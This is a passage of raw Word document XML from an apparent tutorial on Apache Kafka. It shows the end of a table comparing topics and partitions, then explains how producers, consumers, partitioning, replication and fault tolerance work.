            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2758F2E5"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Storage Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A6B10B0"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>A topic itself doesn’t determine the location of the data; partitions within a topic are spread across brokers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="186BED15"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Partitions are distributed across multiple brokers in the Kafka cluster.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009964FC" w:rsidRPr="00CE4B95" w14:paraId="0862C0B9" w14:textId="77777777" w:rsidTr="009964FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7900B8FE"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Parallelism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BC5E6FB"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>A topic can have multiple partitions to enable parallelism in data processing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="623AE4A7"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Partitions enable parallelism, with each consumer in a group reading from different partitions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009964FC" w:rsidRPr="00CE4B95" w14:paraId="69331BFA" w14:textId="77777777" w:rsidTr="009964FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F883BD1"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Consumer Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="386BAD1F"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Multiple consumers can subscribe to a topic, but they consume data from its partitions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15DD6331"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Consumers within a consumer group can consume data from different partitions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009964FC" w:rsidRPr="00CE4B95" w14:paraId="7EC44B4D" w14:textId="77777777" w:rsidTr="009964FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68C5231B"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Producer Write</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DE0A21D"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Producers write data to a topic, but the partition is determined by the partitioner.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DB83489"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Producers write data to partitions based on partitioning logic (e.g., round-robin or key-based).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009964FC" w:rsidRPr="00CE4B95" w14:paraId="0C5FAB09" w14:textId="77777777" w:rsidTr="009964FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B89B984"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Number of Instances</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D9ED032"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>A topic exists once in the Kafka cluster.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50A606CC" w14:textId="77777777" w:rsidR="009964FC" w:rsidRPr="00CE4B95" w:rsidRDefault="009964FC" w:rsidP="009964FC">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>A topic can have multiple partitions (default is 1 unless specified), and each partition is a separate log.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4D313376" w14:textId="77777777" w:rsidR="009964FC" w:rsidRPr="00CE4B95" w:rsidRDefault="009964FC" w:rsidP="009964FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How Kafka Works with Topics and Partitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739022BC" w14:textId="77777777" w:rsidR="009964FC" w:rsidRPr="00CE4B95" w:rsidRDefault="009964FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="240"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Producers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B918393" w14:textId="77777777" w:rsidR="009964FC" w:rsidRPr="00CE4B95" w:rsidRDefault="009964FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="240"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Producers publish messages to a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>topic</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Each message is assigned to a partition based on a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partitioning strategy</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18719338" w14:textId="77777777" w:rsidR="009964FC" w:rsidRPr="00CE4B95" w:rsidRDefault="009964FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="240"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">If a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is provided with the message, Kafka uses the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to determine the partition to which the message belongs (usually by applying a hashing algorithm). If no key is provided, Kafka uses a round-robin approach.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582985B6" w14:textId="77777777" w:rsidR="009964FC" w:rsidRPr="00CE4B95" w:rsidRDefault="009964FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="240"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFB8410" w14:textId="77777777" w:rsidR="009964FC" w:rsidRPr="00CE4B95" w:rsidRDefault="009964FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="240"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Consumers subscribe to a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>topic</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and read from its </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Each </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumer group</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can have multiple consumers, with each consumer reading from different partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0637B4" w14:textId="77777777" w:rsidR="009964FC" w:rsidRPr="00CE4B95" w:rsidRDefault="009964FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="240"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Kafka guarantees that each partition is consumed by only </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a consumer group at a time. If there are more consumers than partitions, some consumers will be idle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0893985C" w14:textId="77777777" w:rsidR="009964FC" w:rsidRPr="00CE4B95" w:rsidRDefault="009964FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="240"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Scalability and Fault Tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2148BC18" w14:textId="77777777" w:rsidR="009964FC" w:rsidRPr="00CE4B95" w:rsidRDefault="009964FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="240"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Kafka scales horizontally by adding </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>more partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. More partitions allow higher parallelism, meaning multiple consumers can read from the topic simultaneously, thus improving throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E64A0CF" w14:textId="77777777" w:rsidR="009964FC" w:rsidRPr="00CE4B95" w:rsidRDefault="009964FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="240"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Partitions also enable </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fault tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Kafka replicates each partition across multiple brokers, ensuring that even if a broker fails, the data is available from other replicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757A18F6" w14:textId="77777777" w:rsidR="009964FC" w:rsidRPr="00CE4B95" w:rsidRDefault="009964FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="240"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Replicas</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681C87A1" w14:textId="77777777" w:rsidR="009964FC" w:rsidRPr="00CE4B95" w:rsidRDefault="009964FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="240"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Each partition has a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>replica</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. These replicas are maintained on different brokers to ensure fault tolerance. If one broker fails, Kafka can retrieve the data from another replica of the partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298C2BD8" w14:textId="254D955D" w:rsidR="009964FC" w:rsidRPr="00CE4B95" w:rsidRDefault="009964FC" w:rsidP="009964FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="017AB6B8" w14:textId="77777777" w:rsidR="009964FC" w:rsidRPr="00CE4B95" w:rsidRDefault="009964FC" w:rsidP="009964FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC05BA0" w14:textId="77777777" w:rsidR="009964FC" w:rsidRPr="00CE4B95" w:rsidRDefault="009964FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="241"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Topic</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A logical categorization for data streams in Kafka.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D87FE76" w14:textId="77777777" w:rsidR="009964FC" w:rsidRPr="00CE4B95" w:rsidRDefault="009964FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
